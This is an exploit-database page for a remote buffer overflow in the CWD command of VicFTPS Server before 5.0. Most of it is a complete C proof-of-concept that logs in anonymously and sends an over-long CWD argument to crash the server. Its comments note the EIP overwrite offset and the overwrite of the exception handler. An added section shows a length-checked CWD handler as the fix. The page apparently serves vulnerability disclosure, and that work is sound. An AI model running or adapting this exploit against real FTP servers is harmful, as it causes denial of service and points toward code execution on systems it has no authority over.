
VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)

18 Feb 2007 00:00:00 | Reported by r0ut3r | Type: exploitdb | Source: www.exploit-db.com

VicFTPs Server versions before 5.0 contain a remote buffer overflow in the handling of the 'CWD' command, which leads to a denial of service (DoS).

Code
/*
VicFTPs Server CWD Remote Buffer Overflow Vulnerability
                 DoS Proof of concept

            r0ut3r (writ3r [at] gmail.com)

Thanks to:
Marsu (Marsupilamipowa [at] hotmail.fr)
for helping me out with this vulnerability.

Greets Marsu, and Timq.

Description:
Sending a long argument to CWD will cause VicFTPs Server
to overwrite memory. EIP is overwritten at 323. The POC
uses a larger buffer to overwrite exception handler,
preventing an error message.  
*/

#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_addr() */

#define PORT 21

int s;
struct sockaddr_in sock_addr;

char recvbuf[1024];
char pwn[450];

int main(int argc, char* argv[])
{
      if (argc < 2) {
        printf("Usage: %s <ip>\n", argv[0]);
        return 1; }

      if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
        printf("error with socket\n");
        return 1; }

      sock_addr.sin_family = AF_INET;
      sock_addr.sin_addr.s_addr = inet_addr(argv[1]);
      sock_addr.sin_port = htons(PORT);

      if (connect(s, (struct sockaddr *)&sock_addr, sizeof(struct sockaddr)) == -1) {
        printf("unable to connect\n");
        return 1; }

      printf("[+] Connected\n");
      memset(recvbuf, '\0', 1024);
      recv(s, recvbuf, 1024, 0);

      /* Log in as anonymous; each literal is 16 characters plus the NUL (17 bytes) */
      char userbuf[50];
      printf("[+] Sending user...\n");
      memset(userbuf, '\0', 50);
      memcpy(userbuf, "USER anonymous\r\n", 17);
      if (send(s, userbuf, strlen(userbuf), 0) == -1) {
        printf("unable to send data\n");
        return 1; }

      memset(recvbuf, '\0', 1024);
      recv(s, recvbuf, 1024, 0);

      char passbuf[50];
      printf("[+] Sending pass...\n");
      memset(passbuf, '\0', 50);
      memcpy(passbuf, "PASS anonymous\r\n", 17);
      if (send(s, passbuf, strlen(passbuf), 0) == -1) {
        printf("unable to send data\n");
        return 1; }
      memset(recvbuf, '\0', 1024);
      recv(s, recvbuf, 1024, 0);

      printf("[+] Building payload. \n");
      memset(pwn, '\0', 450);
      memcpy(pwn, "CWD ", 4);
      memset(pwn+4, 'A', 400);
      memcpy(pwn+404, "\r\n", 2);

      printf("[+] Sending payload.\n");
      if (send(s, pwn, strlen(pwn), 0) == -1) {
        printf("unable to send data\n");
        return 1; }

      printf("[!] Boom! crashed?!\n");

      return 0;
}

// milw0rm.com [2007-02-18]
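
The header comment above attributes the crash to an over-long CWD argument overwriting memory. The following is an added example, not part of the original advisory and not VicFTPS code, of a CWD handler that checks the argument length before copying it into a fixed buffer. The names `handle_cwd`, `demo_oversized` and `MAX_PATH_ARG`, the 255-byte limit and the choice of reply codes are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>

#define MAX_PATH_ARG 255 /* assumed limit; the server's real buffer size is not on the page */

/* Hypothetical hardened handler: validates one control-channel line and
 * copies the CWD argument only if it fits. Returns an FTP reply code. */
int handle_cwd(const char *line, char *path_out, size_t path_cap)
{
    size_t len = strcspn(line, "\r\n");          /* line length without CRLF */
    if (len < 4 || strncasecmp(line, "CWD ", 4) != 0)
        return 500;                              /* not a CWD command */

    const char *arg = line + 4;
    size_t arg_len = len - 4;
    if (arg_len == 0)
        return 501;                              /* missing argument */
    if (arg_len > MAX_PATH_ARG || arg_len >= path_cap)
        return 501;                              /* reject outright, never truncate and continue */

    memcpy(path_out, arg, arg_len);              /* bounded by the checks above */
    path_out[arg_len] = '\0';
    return 250;
}

/* Constructed input with the same shape as the request in the PoC:
 * "CWD " followed by 400 filler bytes and CRLF. */
int demo_oversized(void)
{
    char line[4 + 400 + 2 + 1];
    char path[MAX_PATH_ARG + 1];
    memcpy(line, "CWD ", 4);
    memset(line + 4, 'A', 400);
    memcpy(line + 404, "\r\n", 3);               /* CRLF plus terminating NUL */
    return handle_cwd(line, path, sizeof path);
}

int main(void)
{
    char path[MAX_PATH_ARG + 1];
    printf("oversized CWD -> %d\n", demo_oversized());
    printf("CWD /pub      -> %d (%s)\n",
           handle_cwd("CWD /pub\r\n", path, sizeof path), path);
    return 0;
}
```

The same length check belongs wherever the control-channel line is first read from the socket, so that an over-long line is refused before any command handler sees it.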

Vulners AI Score: 7.4 (High risk)